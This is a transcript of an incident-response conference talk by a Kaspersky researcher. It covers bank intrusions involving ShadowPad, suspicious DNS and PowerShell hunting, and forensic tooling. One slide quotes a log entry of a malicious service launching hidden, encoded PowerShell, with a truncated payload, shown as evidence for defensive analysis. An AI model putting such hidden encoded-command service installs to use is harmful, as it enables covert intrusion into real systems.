Sergey Golovanov - Indecent Response 2018

Transcript

1. Indecent response 2018
   Sergey @k1k_ Golovanov
   Principal Security Researcher
   Kaspersky Lab
   

   View Slide

2. Challenge: find a SDC bus speed
   

   View Slide

3. View Slide

4. Agenda
   1.Shadowpad
   2.0x403AA91EE
   4.Plans
   3.Scanner2
   

   View Slide

5. 1.Shadowpad
   

   View Slide

6. Case overview:
   1.Antifraud system in a bank is detecting
   printing of a lot of elite cards for the last several
   hours
   2.Bank is starting network audit
   3.Bank is discovering suspicion DNS requests
   4.Forensics can not find malware on PCs
   5.Bank asks for help…
   

   View Slide

7. DNS requests
   

   View Slide

8. View Slide

9. View Slide

10. “Our worldwide customers range from
    small businesses right up to global Fortune
    500 companies.” NetSarang
    AmericanExpress
    BankofAmericaCorp.
    BankofChina
    BNPParibas
    Citigroup
    DeutscheBank
    Fortis
    GeneralElectric
    INGGroup
    MerrillLynch
    MorganStanley
    ShinhanFinancialGroup
    SocieteGenerale
    UBS
    https://webcache.googleusercontent.com/search?q=cache:m7Nc1_mRksgJ:https://www.netsara
    ng.com/about/client.html+&cd=1&hl=ru&ct=clnk&gl=ru
    

    View Slide

11. https://securelist.com/shadowpad
    -in-corporate-networks/81432/
    

    View Slide

12. What was done?
    

    View Slide

13. AutoMA – static analysis framework
    

    View Slide

14. Shadowpad after autoMA
    

    View Slide

15. Miniduke after autoMA
    

    View Slide

16. 2.0x403AA91EE
    

    View Slide

17. Case overview:
    

    View Slide

18. View Slide

19. View Slide

20. How to find suspicion DNS requests?
    sort | uniq -c | sort -rn
    

    View Slide

21. How to find suspicion powershell?
    sort | uniq -c | sort -rn
    

    View Slide

22. parse_evtx.exe System.evtx | findstr /i "power" | more
    Record #2396788 2027.02.22-08:03:00 'Computer':PC1',
    'Channel':'System', 'EventSourceName':'Service Control Manager',
    'Guid':‘GUID'Name':'Service Control Manager',
    'xmlns':'http://schemas.microsoft.com/win/2004/08/events/event', 'Level':04,
    'Opcode':00, 'Task':0000, 'EventID':7045 (A service was installed in the
    system.), 'Qualifiers':16384, 'Keywords':8080000000000000,
    'SystemTime':2027.02.22-08:03:00, 'ProcessID':00000648, 'ThreadID':00010692,
    'EventRecordID':0000000002396788, 'Version':00, 'UserID':SID,
    'ServiceName':‘1aec4f0', 'ImagePath':'%COMSPEC% /b /c start /b /min
    powershell.exe -nop -w hidden -encodedcommand
    JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5A
    FMAdAByAGUAYQBtACgA
    

    View Slide

23. https://github.com/KasperskyLab/ForensicsTools/
    

    View Slide

24. 3.Scanner2
    

    View Slide

25. Case overview:
    1. No money
    2. No logs
    3. No team
    4. No idea about network
    5. CISO!
    

    View Slide

26. What to do?
    we need logs
    we need mfts
    we need regs
    

    View Slide

27. WE NEED TO RECOMPILE EVERYTHING!
    

    View Slide

28. Awesome batch file
    

    View Slide

29. How to find something suspicion ?
    sort | uniq -c | sort -rn
    

    View Slide

30. https://cdn.securelist.com/files/
    2017/12/HappyNewYear.zip
    

    View Slide

31. 4. PLANS
    

    View Slide

32. 1. MFT is a hell. Sleuthkit is not enough. We need
    more data about deleted files.
    2. USN J is required with no HDD touch.
    3. Reg analysis is needed with unallocated part.
    

    View Slide

33. Agenda
    1.Shadowpad
    2.0x403AA91EE
    4.Plans
    3.Scanner2
    

    View Slide

34. Зачем?
    

    View Slide

35. View Slide

36. Thank you!
    Sergey @k1k_ Golovanov
    Principal Security Researcher
    Kaspersky Lab
    

    View Slide